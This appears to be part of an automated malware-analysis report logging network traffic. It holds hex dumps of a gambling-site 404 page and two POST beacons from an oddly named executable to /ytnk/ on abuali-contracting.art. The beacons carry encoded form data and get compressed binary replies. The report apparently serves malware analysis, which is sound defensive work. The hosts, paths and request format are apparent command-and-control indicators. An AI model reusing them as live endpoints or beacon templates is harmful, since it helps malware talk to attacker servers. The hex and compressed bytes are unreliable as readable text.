                                                                                                              Data Ascii: 2099<!DOCTYPE html><html lang="id-ID"><head> <meta charset="utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta name="viewport" content="width=device-width, initial-scale=1, viewport-fit=cover" /><meta name="generator" content="BukanWordpress" /><link rel="icon" type="image/x-icon" href="https://www.nagasl89.baby/favicon.ico" /><link rel="sitemap" href="https://www.nagasl89.baby/sitemap.xml" /><link rel="alternate" type="application/rss+xml" title="RTP SLOTO89 F
                                                                                                              Nov 5, 2024 15:37:23.683919907 CET1289INData Raw: 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 61 67 61 73 6c 38 39 2e 62 61 62 79 2f 66 65 65 64 2f 72 73 73 22 20 2f 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 48 61 6c 61 6d 61 6e 20 69 6e 69 20 74 69 64 61 6b 20 61 64
                                                                                                              Data Ascii: eed" href="https://www.nagasl89.baby/feed/rss" /> <title>Halaman ini tidak ada! - RTP SLOTO89</title> <meta name="description" content="404 Not Found"/> <meta name="keywords" content="SLOTO89, SLOTO89, RTP SLOTO 89, slot gacor, l
                                                                                                              Nov 5, 2024 15:37:23.683989048 CET1289INData Raw: 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 61 67 61 73 6c 38 39 2e 62 61 62 79 2f 74 68 65 6d 65 73 2f 72 74 70 2f 63 73 73 2f 73 74 79 6c 65 73 6c 6f 74 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61
                                                                                                              Data Ascii: ref="https://www.nagasl89.baby/themes/rtp/css/styleslot.css" type="text/css" media="all"> <link rel="stylesheet" id="twentyfifteen-style-css" href="https://www.nagasl89.baby/themes/rtp/css/custom.css" type="text/css" media="all"> <scri
                                                                                                              Nov 5, 2024 15:37:23.684032917 CET1289INData Raw: 67 3a 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 72 74 69 63 6c 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 61 67 61 73 6c
                                                                                                              Data Ascii: g:type" content="article"> <meta property="og:url" content="https://www.nagasl89.baby/"> <meta property="og:title" content=""> <meta property="og:description" content="404 Not Found"> <meta property="og:site_name" content="Hala
                                                                                                              Nov 5, 2024 15:37:23.684075117 CET1289INData Raw: 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 72 65 73 2e 63 6c 6f 75 64 69 6e 61 72 79 2e 63 6f 6d 2f 70 72 61 63 74 69 63 61 6c 64 65 76 2f 69 6d 61 67 65 2f 66 65 74 63 68 2f 73 2d 2d 67 44
                                                                                                              Data Ascii: "apple-touch-icon" href="https://res.cloudinary.com/practicaldev/image/fetch/s--gDM0_LTS--/c_limit,f_png,fl_progressive,q_80,w_180/https://practicaldev-herokuapp-com.freetls.fastly.net/assets/devlogo-pwa-512.png"--> ...link rel="apple-tou
                                                                                                              Nov 5, 2024 15:37:23.684114933 CET1289INData Raw: 6d 69 74 2c 66 5f 70 6e 67 2c 66 6c 5f 70 72 6f 67 72 65 73 73 69 76 65 2c 71 5f 38 30 2c 77 5f 31 32 38 2f 68 74 74 70 73 3a 2f 2f 70 72 61 63 74 69 63 61 6c 64 65 76 2d 68 65 72 6f 6b 75 61 70 70 2d 63 6f 6d 2e 66 72 65 65 74 6c 73 2e 66 61 73
                                                                                                              Data Ascii: mit,f_png,fl_progressive,q_80,w_128/https://practicaldev-herokuapp-com.freetls.fastly.net/assets/devlogo-pwa-512.png" rel="icon" sizes="128x128"--> <meta name="apple-mobile-web-app-title" content=""> <meta name="application-name" conte
                                                                                                              Nov 5, 2024 15:37:23.684155941 CET1289INData Raw: 20 7b 74 68 69 73 2e 76 61 6c 75 65 20 3d 20 27 27 3b 7d 22 20 6f 6e 62 6c 75 72 3d 22 69 66 20 28 74 68 69 73 2e 76 61 6c 75 65 20 3d 3d 20 27 27 29 20 7b 74 68 69 73 2e 76 61 6c 75 65 20 3d 20 27 43 61 72 69 27 3b 7d 22 3e 0d 0a 20 20 20 20 20
                                                                                                              Data Ascii: {this.value = '';}" onblur="if (this.value == '') {this.value = 'Cari';}"> <input type="submit" value="Cari" class="search-button"> </form> </div></article> <footer id="colophon" cla
                                                                                                              Nov 5, 2024 15:37:23.684184074 CET121INData Raw: 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 61 67 61 73 6c 38 39 2e 62 61 62 79 2f 6a 73 2f 67 6c 6f 62 61 6c 2e 6a
                                                                                                              Data Ascii: ipt> <script type="text/javascript" src="https://www.nagasl89.baby/js/global.js"></script> </body></html>
                                                                                                              Nov 5, 2024 15:37:23.684211969 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              50192.168.11.204979166.198.240.15804732C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:37:28.821978092 CET753OUTPOST /ytnk/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 201
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.abuali-contracting.art
                                                                                                              Origin: http://www.abuali-contracting.art
                                                                                                              Referer: http://www.abuali-contracting.art/ytnk/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Raw: 51 32 5f 34 3d 6a 48 6f 68 30 62 34 4e 57 4b 75 43 6d 76 41 5a 74 6d 45 39 44 38 4a 47 6f 46 73 2b 2f 75 33 75 65 36 67 48 58 76 32 45 4b 61 55 6f 62 31 47 4b 74 39 47 6a 62 6f 68 4a 77 64 4e 36 49 6f 7a 66 6a 55 39 74 39 46 34 49 6a 6d 35 48 41 65 6e 37 41 66 77 36 53 6d 72 42 53 77 53 45 37 41 67 4f 6f 71 71 6d 78 76 33 42 4b 76 74 62 53 36 6e 31 63 67 33 52 5a 71 58 38 37 31 79 2b 35 50 6a 43 35 4a 49 31 66 31 4e 74 73 62 66 54 77 77 2b 37 58 4f 4c 37 47 43 70 74 67 48 6a 58 67 51 4b 78 45 39 70 53 56 73 46 63 51 2b 30 73 43 41 44 34 4c 66 54 32 46 6d 41 4e 48 56 52 71 67 76 78 33 51 51 3d 3d
                                                                                                              Data Ascii: Q2_4=jHoh0b4NWKuCmvAZtmE9D8JGoFs+/u3ue6gHXv2EKaUob1GKt9GjbohJwdN6IozfjU9t9F4Ijm5HAen7Afw6SmrBSwSE7AgOoqqmxv3BKvtbS6n1cg3RZqX871y+5PjC5JI1f1NtsbfTww+7XOL7GCptgHjXgQKxE9pSVsFcQ+0sCAD4LfT2FmANHVRqgvx3QQ==
                                                                                                              Nov 5, 2024 15:37:29.149008989 CET1289INHTTP/1.1 404 Not Found
                                                                                                              Date: Tue, 05 Nov 2024 14:37:28 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/8.1.29
                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                              Link: <https://abuali-contracting.art/wp-json/>; rel="https://api.w.org/"
                                                                                                              Strict-Transport-Security: max-age=63072000; includeSubDomains
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Vary: Accept-Encoding
                                                                                                              Content-Encoding: gzip
                                                                                                              Content-Length: 24178
                                                                                                              Connection: close
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed bd 69 93 e4 c6 91 20 fa 99 6d f6 fe 03 98 34 b2 2b c9 04 12 f7 51 d5 d5 12 59 24 25 ce 36 45 99 9a 92 de 4a 4d 2b 43 02 c8 2a 74 23 13 29 20 b3 0e 96 ea c3 68 24 ad 56 fb 7e c5 ee ce 8a c3 37 1a 99 46 6f 76 4c fb 4b aa ff cd 73 f7 c0 7d 25 f2 e8 6e 72 d4 4d 56 15 10 f0 f0 70 f7 f0 f0 70 8f f3 c1 9b 1f 7e 76 f2 f9 7f fe e1 47 dc f9 72 16 3c bc f7 00 ff 70 ae 1f 1d 0f a2 65 30 e0 02 7b 7e 76 3c b0 a3 01 b7 88 bc a9 7f 75 3c 08 cf 0e 01 76 b9 88 0f c7 e3 f0 6c 21 cc bc f1 3c 7e 6b 80 59 3d db 7d 78 ef 8d 07 33 6f 69 73 ce b9 1d c5 de f2 78 f0 e3 cf 3f e6 cd 01 37 ce be cc ed 99 77 3c b8 f0 bd cb 45 18 2d 07 9c 13 ce 97 de 1c 20 2f 7d 77 79 7e ec 7a 17 be e3 f1 f4 32 e2 fc b9 bf f4 ed 80 8f 1d 3b f0 8e 25 c2 73 ef 8d 37 1e bc c9 f3 dc fb 41 00 df b9 cf e6 1e f7 f8 a3 cf 38 55 30 04 55 90 38 9e b3 fd 30 f6 42 c1 09 67 1c cf 3f fc bf 10 7e e9 2f 03 ef e1 83 31 fb 8b 29 05 5a a2 70 12 2e e3 02 25 f3 d0 9f bb de 15 a3 ba 04 7a e6 cd bd c8 5e 86 51 01 ba 42 c7 c1 fb 9f 7c 06 [TRUNCATED]
                                                                                                              Data Ascii: i m4+QY$%6EJM+C*t#) h$V~7FovLKs}%nrMVpp~vGr<pe0{~v<u<vl!<~kY=}x3oisx?7w<E- /}wy~z2;%s7A8U0U80Bg?~/1)Zp.%z^QB|)A)[^/Xc/p>0v7"X>fq3.wFgg8 *ql%de>#Y3O'&YQ}x3T7( c18F6`xuRtJ)Ee+W;y~>IFh'KPG/6k<E<pE>%)&jK6b\E-p*4R\/ y$vQjQ]E,F!]b@DvQ(y99yRhI&bn&D7UOp0%S2`RBn/Ej5|sBx
                                                                                                              Nov 5, 2024 15:37:29.149110079 CET1289INData Raw: 55 54 d4 55 14 f4 b5 4f 4b 2f f0 16 e7 e1 1c 9b cf 7b 96 ae 6b a2 ae 19 a2 a5 ab f0 2d 08 cf c2 c1 61 de 58 3f 99 d9 67 de 67 93 a7 9e b3 dc a0 90 cb 05 9f 74 63 4f c6 ab 45 10 da 6e fc 64 2c 8b b2 fa 64 2c 1a 4f c6 4e 14 2e 16 9e cb eb 96 69 a8
                                                                                                              Data Ascii: UTUOK/{k-aX?ggtcOEnd,d,ON.i<S';<7l?ksO# esXsr&1XmnL7Y}+e~k\?@/A4;-Tyel%dm;#8byE
                                                                                                              Nov 5, 2024 15:37:29.149153948 CET1289INData Raw: dc 07 20 24 70 32 c0 67 58 86 8b c1 c8 16 a6 21 8e 3d eb a2 c8 29 f2 e2 8a 7b 3f f2 ed 00 10 dd 66 ad 03 1a 60 18 7d 64 83 9a e7 ed 63 78 13 fe dc fb e2 78 79 60 8f 3c 90 08 16 90 cb 69 89 df 99 e1 a8 51 cf 3a 25 a8 ac a5 10 47 ce 31 08 54 00 21
                                                                                                              Data Ascii: $p2gX!=){?f`}dcxxy`<iQ:%G1T!~Sxs\hXMba{.Q|s"GV|1)oCw??o2FY|v./`gG <[fjL^,%>c9gi
                                                                                                              Nov 5, 2024 15:37:29.149194956 CET1289INData Raw: 23 81 23 fb c2 e3 8a 9e b8 5a 8f e8 14 b9 51 b8 e0 a7 3e 8e b7 1f 4e 82 55 74 20 e9 8b ab 21 17 db e0 73 a1 2f 2c 99 e2 db c3 a3 cd 20 cf 48 f6 40 4a 00 7c bd a5 d9 f8 9f 2a 1e b1 4a a0 c6 7e 54 ae 10 75 71 75 54 16 c3 51 49 ca 49 5f 2c 8b 00 f7
                                                                                                              Data Ascii: ##ZQ>NUt !s/, H@J|*J~TuquTQII_,<<)'HQ*h!*b^!$*ZzG5g#!XF<Opqs8lxD<oC%sW\BOiM1V1|kh IumqS}5Azf.=^kx/
                                                                                                              Nov 5, 2024 15:37:29.149236917 CET1289INData Raw: b4 f9 f2 cf fb 1c 79 f0 c7 f7 c1 a2 b0 c5 e2 0d e2 c1 f5 c0 6c 03 53 4b 45 66 00 2d 23 6a c5 26 5d 9c 49 cb f2 81 5a a7 81 66 52 04 01 ac cf 48 a6 da 9b da ab 80 59 99 b6 29 5c 1c b9 6d 2c b8 0a 5f 9e 31 6f a6 75 d4 86 68 dd bc 77 4e f6 66 b3 7f
                                                                                                              Data Ascii: ylSKEf-#j&]IZfRHY)\m,_1ouhwNf}TKTLiBe2a:Zn9{X1TkfZ-i,4'^YgzCn2B|p NK+._6Tj`}EH`C)#%nfjrT; \%))T
                                                                                                              Nov 5, 2024 15:37:29.149277925 CET1289INData Raw: 17 5b 1a 73 3d 12 17 40 14 0d 67 62 1f 35 7f e6 f9 e8 6c 72 28 8e 24 59 1d 49 a6 de 06 85 0e 07 74 e8 92 88 e8 f4 89 2d ad 05 cc 10 8b c6 48 d2 d7 c1 cb 84 58 b3 4d 63 2d 60 8a d8 02 dc 8a 56 04 4f bc 0e 36 1a 48 8b ac 70 8c 8a 41 24 2b 03 ae e7
                                                                                                              Data Ascii: [s=@gb5lr($YIt-HXMc-`VO6HpA$+.<a;mdy$dYIh$k,%czH.M8mqz0l'np;ogbt:UZ3-I<9)5<|U^Q7\0%i6Vq
                                                                                                              Nov 5, 2024 15:37:29.149399042 CET1289INData Raw: 10 c7 0c db d4 d2 34 bd a5 f9 9c 7b 57 e0 87 3b 3e 8e 31 81 94 0d 53 34 5b b8 4d ad 29 b4 32 ab ca 67 16 28 d7 06 60 b2 31 99 94 b3 96 a0 39 3a 9b d8 07 fa 48 52 8d 91 2c 1b 23 69 c8 89 6f 63 e2 81 a4 69 23 08 a6 65 59 1d e2 e1 76 10 a9 b4 15 5d
                                                                                                              Data Ascii: 4{W;>1S4[M)2g(`19:HR,#ioci#eYv]5yE^8L1+^9qm)h9 k2\$1IVd.RE%rEc}PlY1GOQG+CQ_DYgeXFUo9(CO03H
                                                                                                              Nov 5, 2024 15:37:29.149403095 CET1289INData Raw: 4f b4 46 9f 66 30 69 6f 19 f7 b0 70 47 15 80 b2 b3 2a 29 2a 3f e2 4a 1b 43 39 19 7c 8b f6 fc 04 94 23 60 47 73 72 c5 bd a6 6b 10 b0 d5 71 80 a1 ba a0 8d 4b 8e bf 29 23 a3 95 29 15 0a 59 5a 71 b3 4b a1 a0 21 94 f4 6e 26 8c 74 49 37 2e e0 03 ca d0
                                                                                                              Data Ascii: OFf0iopG*)*?JC9|#`GsrkqK)#)YZqK!n&tI7.o*0b;%|k$sR+V*7YHZ6LlxUQmb8E["-V_j7V,Z$VN&:.k=ur."nsuvQag6WI)
                                                                                                              Nov 5, 2024 15:37:29.149611950 CET1289INData Raw: 4a 56 7c d9 4b f4 b9 05 f2 fe 51 e7 16 c8 7b 44 9b 5b 60 ed 19 65 6e 81 79 8b e8 72 8b 52 76 8b 2a 77 2f b0 7f 34 b9 4d 59 db 44 91 5b 57 d5 46 d1 e3 b6 aa b6 51 d4 b8 35 2b fd a3 c5 ad 8b e8 15 25 6e 81 bd 77 74 b8 8d f1 eb 15 15 6e 53 b5 7d a2
                                                                                                              Data Ascii: JV|KQ{D[`enyrRv*w/4MYD[WFQ5+%nwtnS}-nnv}oBE{[`mw}tFu[_4QVXmtGm[zNHEi~$5vm(l[a@#V=(k[]wMCyI7I}Q;*
                                                                                                              Nov 5, 2024 15:37:29.149616957 CET1289INData Raw: 9b 51 b6 51 2a f5 ea 66 f1 36 77 69 aa 4d 75 15 62 2a 4d 56 1d 6f 22 99 9a 67 ab b2 68 81 e3 2b ed 6e 90 0b b3 4b fd b8 92 f7 2f 28 79 6b 41 ad 0b 28 1a 22 8a 2e 8b 9d c9 1d ba 1e c5 51 3d cb b5 dc 09 c8 1f 24 ad 99 10 da 4d 25 f8 6b ea b6 f8 e2
                                                                                                              Data Ascii: QQ*f6wiMub*MVo"gh+nK/(ykA(".Q=$M%k^c+%tE4G4S*]miH{E~N|/NQY Bm5e2-EIN4M[V1tTu-td7dd1)t:u[6Hgyj]cJF{PB<l[#;(]EAE
                                                                                                              Nov 5, 2024 15:37:29.267188072 CET1289INData Raw: 82 fb b3 cf 7f e0 7f fa 39 a4 2f a3 95 97 81 02 f6 a9 7f 86 d0 45 e9 c1 e7 6a ed 7f 34 77 b7 d1 80 dc 22 65 55 69 2f 7c e1 52 08 a3 b3 f1 80 d9 9c fc 4b ab ce 3f 8d c3 39 80 8f 1f 16 f0 7d e4 fa cb 1f ff e8 93 01 b7 bc 5e 78 c7 03 7b b1 08 7c 87
                                                                                                              Data Ascii: 9/Ej4w"eUi/|RK?9}^x{||q] ?za Wp;d@i: : .a4fx<)8?8tA^y2JXHLBap3rf/@3;t|=xo`.#eu97S


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              51192.168.11.204979266.198.240.15804732C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:37:31.478069067 CET773OUTPOST /ytnk/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 221
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.abuali-contracting.art
                                                                                                              Origin: http://www.abuali-contracting.art
                                                                                                              Referer: http://www.abuali-contracting.art/ytnk/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Raw: 51 32 5f 34 3d 6a 48 6f 68 30 62 34 4e 57 4b 75 43 6e 4f 77 5a 68 68 51 39 49 38 49 30 74 46 73 2b 31 4f 33 71 65 36 6b 48 58 72 6d 55 4b 73 45 6f 61 58 65 4b 75 38 47 6a 4c 34 68 4a 34 39 4e 37 43 49 79 79 6a 55 78 6c 39 41 51 49 6a 6c 46 48 41 63 76 37 41 6f 45 35 41 47 72 48 55 77 53 61 32 67 67 4f 6f 71 71 6d 78 76 6a 76 4b 75 4a 62 54 4b 33 31 64 45 6a 53 54 4b 58 37 72 46 79 2b 76 2f 6a 47 35 4a 4a 6d 66 77 55 6c 73 65 62 54 77 78 4f 37 57 63 7a 36 64 53 6f 48 2b 33 69 6d 6d 6b 54 2b 43 39 46 75 63 4c 39 30 56 65 78 51 44 57 53 69 57 74 6e 53 47 31 63 2f 44 6c 6f 43 69 74 77 73 4e 62 32 6c 48 4f 65 54 2f 39 43 2b 2f 57 50 72 4f 6d 50 53 4c 4d 38 3d
                                                                                                              Data Ascii: Q2_4=jHoh0b4NWKuCnOwZhhQ9I8I0tFs+1O3qe6kHXrmUKsEoaXeKu8GjL4hJ49N7CIyyjUxl9AQIjlFHAcv7AoE5AGrHUwSa2ggOoqqmxvjvKuJbTK31dEjSTKX7rFy+v/jG5JJmfwUlsebTwxO7Wcz6dSoH+3immkT+C9FucL90VexQDWSiWtnSG1c/DloCitwsNb2lHOeT/9C+/WPrOmPSLM8=
                                                                                                              Nov 5, 2024 15:37:31.809813976 CET1289INHTTP/1.1 404 Not Found
                                                                                                              Date: Tue, 05 Nov 2024 14:37:31 GMT
                                                                                                              Server: Apache
                                                                                                              X-Powered-By: PHP/8.1.29
                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                              Link: <https://abuali-contracting.art/wp-json/>; rel="https://api.w.org/"
                                                                                                              Strict-Transport-Security: max-age=63072000; includeSubDomains
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Vary: Accept-Encoding
                                                                                                              Content-Encoding: gzip
                                                                                                              Content-Length: 24178
                                                                                                              Connection: close
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed bd 69 93 e4 c6 91 20 fa 99 6d f6 fe 03 98 34 b2 2b c9 04 12 f7 51 d5 d5 12 59 24 25 ce 36 45 99 9a 92 de 4a 4d 2b 43 02 c8 2a 74 23 13 29 20 b3 0e 96 ea c3 68 24 ad 56 fb 7e c5 ee ce 8a c3 37 1a 99 46 6f 76 4c fb 4b aa ff cd 73 f7 c0 7d 25 f2 e8 6e 72 d4 4d 56 15 10 f0 f0 70 f7 f0 f0 70 8f f3 c1 9b 1f 7e 76 f2 f9 7f fe e1 47 dc f9 72 16 3c bc f7 00 ff 70 ae 1f 1d 0f a2 65 30 e0 02 7b 7e 76 3c b0 a3 01 b7 88 bc a9 7f 75 3c 08 cf 0e 01 76 b9 88 0f c7 e3 f0 6c 21 cc bc f1 3c 7e 6b 80 59 3d db 7d 78 ef 8d 07 33 6f 69 73 ce b9 1d c5 de f2 78 f0 e3 cf 3f e6 cd 01 37 ce be cc ed 99 77 3c b8 f0 bd cb 45 18 2d 07 9c 13 ce 97 de 1c 20 2f 7d 77 79 7e ec 7a 17 be e3 f1 f4 32 e2 fc b9 bf f4 ed 80 8f 1d 3b f0 8e 25 c2 73 ef 8d 37 1e bc c9 f3 dc fb 41 00 df b9 cf e6 1e f7 f8 a3 cf 38 55 30 04 55 90 38 9e b3 fd 30 f6 42 c1 09 67 1c cf 3f fc bf 10 7e e9 2f 03 ef e1 83 31 fb 8b 29 05 5a a2 70 12 2e e3 02 25 f3 d0 9f bb de 15 a3 ba 04 7a e6 cd bd c8 5e 86 51 01 ba 42 c7 c1 fb 9f 7c 06 [TRUNCATED]
                                                                                                              Data Ascii: i m4+QY$%6EJM+C*t#) h$V~7FovLKs}%nrMVpp~vGr<pe0{~v<u<vl!<~kY=}x3oisx?7w<E- /}wy~z2;%s7A8U0U80Bg?~/1)Zp.%z^QB|)A)[^/Xc/p>0v7"X>fq3.wFgg8 *ql%de>#Y3O'&YQ}x3T7( c18F6`xuRtJ)Ee+W;y~>IFh'KPG/6k<E<pE>%)&jK6b\E-p*4R\/ y$vQjQ]E,F!]b@DvQ(y99yRhI&bn&D7UOp0%S2`RBn/Ej5|sBx
                                                                                                              Nov 5, 2024 15:37:31.809847116 CET1289INData Raw: 55 54 d4 55 14 f4 b5 4f 4b 2f f0 16 e7 e1 1c 9b cf 7b 96 ae 6b a2 ae 19 a2 a5 ab f0 2d 08 cf c2 c1 61 de 58 3f 99 d9 67 de 67 93 a7 9e b3 dc a0 90 cb 05 9f 74 63 4f c6 ab 45 10 da 6e fc 64 2c 8b b2 fa 64 2c 1a 4f c6 4e 14 2e 16 9e cb eb 96 69 a8
                                                                                                              Data Ascii: UTUOK/{k-aX?ggtcOEnd,d,ON.i<S';<7l?ksO# esXsr&1XmnL7Y}+e~k\?@/A4;-Tyel%dm;#8byE
                                                                                                              Nov 5, 2024 15:37:31.809855938 CET1289INData Raw: dc 07 20 24 70 32 c0 67 58 86 8b c1 c8 16 a6 21 8e 3d eb a2 c8 29 f2 e2 8a 7b 3f f2 ed 00 10 dd 66 ad 03 1a 60 18 7d 64 83 9a e7 ed 63 78 13 fe dc fb e2 78 79 60 8f 3c 90 08 16 90 cb 69 89 df 99 e1 a8 51 cf 3a 25 a8 ac a5 10 47 ce 31 08 54 00 21
                                                                                                              Data Ascii: $p2gX!=){?f`}dcxxy`<iQ:%G1T!~Sxs\hXMba{.Q|s"GV|1)oCw??o2FY|v./`gG <[fjL^,%>c9gi
                                                                                                              Nov 5, 2024 15:37:31.809863091 CET1289INData Raw: 23 81 23 fb c2 e3 8a 9e b8 5a 8f e8 14 b9 51 b8 e0 a7 3e 8e b7 1f 4e 82 55 74 20 e9 8b ab 21 17 db e0 73 a1 2f 2c 99 e2 db c3 a3 cd 20 cf 48 f6 40 4a 00 7c bd a5 d9 f8 9f 2a 1e b1 4a a0 c6 7e 54 ae 10 75 71 75 54 16 c3 51 49 ca 49 5f 2c 8b 00 f7
                                                                                                              Data Ascii: ##ZQ>NUt !s/, H@J|*J~TuquTQII_,<<)'HQ*h!*b^!$*ZzG5g#!XF<Opqs8lxD<oC%sW\BOiM1V1|kh IumqS}5Azf.=^kx/
                                                                                                              Nov 5, 2024 15:37:31.809870958 CET1289INData Raw: b4 f9 f2 cf fb 1c 79 f0 c7 f7 c1 a2 b0 c5 e2 0d e2 c1 f5 c0 6c 03 53 4b 45 66 00 2d 23 6a c5 26 5d 9c 49 cb f2 81 5a a7 81 66 52 04 01 ac cf 48 a6 da 9b da ab 80 59 99 b6 29 5c 1c b9 6d 2c b8 0a 5f 9e 31 6f a6 75 d4 86 68 dd bc 77 4e f6 66 b3 7f
                                                                                                              Data Ascii: ylSKEf-#j&]IZfRHY)\m,_1ouhwNf}TKTLiBe2a:Zn9{X1TkfZ-i,4'^YgzCn2B|p NK+._6Tj`}EH`C)#%nfjrT; \%))T
                                                                                                              Nov 5, 2024 15:37:31.809915066 CET1289INData Raw: 17 5b 1a 73 3d 12 17 40 14 0d 67 62 1f 35 7f e6 f9 e8 6c 72 28 8e 24 59 1d 49 a6 de 06 85 0e 07 74 e8 92 88 e8 f4 89 2d ad 05 cc 10 8b c6 48 d2 d7 c1 cb 84 58 b3 4d 63 2d 60 8a d8 02 dc 8a 56 04 4f bc 0e 36 1a 48 8b ac 70 8c 8a 41 24 2b 03 ae e7
                                                                                                              Data Ascii: [s=@gb5lr($YIt-HXMc-`VO6HpA$+.<a;mdy$dYIh$k,%czH.M8mqz0l'np;ogbt:UZ3-I<9)5<|U^Q7\0%i6Vq
                                                                                                              Nov 5, 2024 15:37:31.809936047 CET1289INData Raw: 10 c7 0c db d4 d2 34 bd a5 f9 9c 7b 57 e0 87 3b 3e 8e 31 81 94 0d 53 34 5b b8 4d ad 29 b4 32 ab ca 67 16 28 d7 06 60 b2 31 99 94 b3 96 a0 39 3a 9b d8 07 fa 48 52 8d 91 2c 1b 23 69 c8 89 6f 63 e2 81 a4 69 23 08 a6 65 59 1d e2 e1 76 10 a9 b4 15 5d
                                                                                                              Data Ascii: 4{W;>1S4[M)2g(`19:HR,#ioci#eYv]5yE^8L1+^9qm)h9 k2\$1IVd.RE%rEc}PlY1GOQG+CQ_DYgeXFUo9(CO03H
                                                                                                              Nov 5, 2024 15:37:31.809943914 CET1289INData Raw: 4f b4 46 9f 66 30 69 6f 19 f7 b0 70 47 15 80 b2 b3 2a 29 2a 3f e2 4a 1b 43 39 19 7c 8b f6 fc 04 94 23 60 47 73 72 c5 bd a6 6b 10 b0 d5 71 80 a1 ba a0 8d 4b 8e bf 29 23 a3 95 29 15 0a 59 5a 71 b3 4b a1 a0 21 94 f4 6e 26 8c 74 49 37 2e e0 03 ca d0
                                                                                                              Data Ascii: OFf0iopG*)*?JC9|#`GsrkqK)#)YZqK!n&tI7.o*0b;%|k$sR+V*7YHZ6LlxUQmb8E["-V_j7V,Z$VN&:.k=ur."nsuvQag6WI)
                                                                                                              Nov 5, 2024 15:37:31.809967041 CET1289INData Raw: 4a 56 7c d9 4b f4 b9 05 f2 fe 51 e7 16 c8 7b 44 9b 5b 60 ed 19 65 6e 81 79 8b e8 72 8b 52 76 8b 2a 77 2f b0 7f 34 b9 4d 59 db 44 91 5b 57 d5 46 d1 e3 b6 aa b6 51 d4 b8 35 2b fd a3 c5 ad 8b e8 15 25 6e 81 bd 77 74 b8 8d f1 eb 15 15 6e 53 b5 7d a2
                                                                                                              Data Ascii: JV|KQ{D[`enyrRv*w/4MYD[WFQ5+%nwtnS}-nnv}oBE{[`mw}tFu[_4QVXmtGm[zNHEi~$5vm(l[a@#V=(k[]wMCyI7I}Q;*
                                                                                                              Nov 5, 2024 15:37:31.809973955 CET1289INData Raw: 9b 51 b6 51 2a f5 ea 66 f1 36 77 69 aa 4d 75 15 62 2a 4d 56 1d 6f 22 99 9a 67 ab b2 68 81 e3 2b ed 6e 90 0b b3 4b fd b8 92 f7 2f 28 79 6b 41 ad 0b 28 1a 22 8a 2e 8b 9d c9 1d ba 1e c5 51 3d cb b5 dc 09 c8 1f 24 ad 99 10 da 4d 25 f8 6b ea b6 f8 e2
                                                                                                              Data Ascii: QQ*f6wiMub*MVo"gh+nK/(ykA(".Q=$M%k^c+%tE4G4S*]miH{E~N|/NQY Bm5e2-EIN4M[V1tTu-td7dd1)t:u[6Hgyj]cJF{PB<l[#;(]EAE
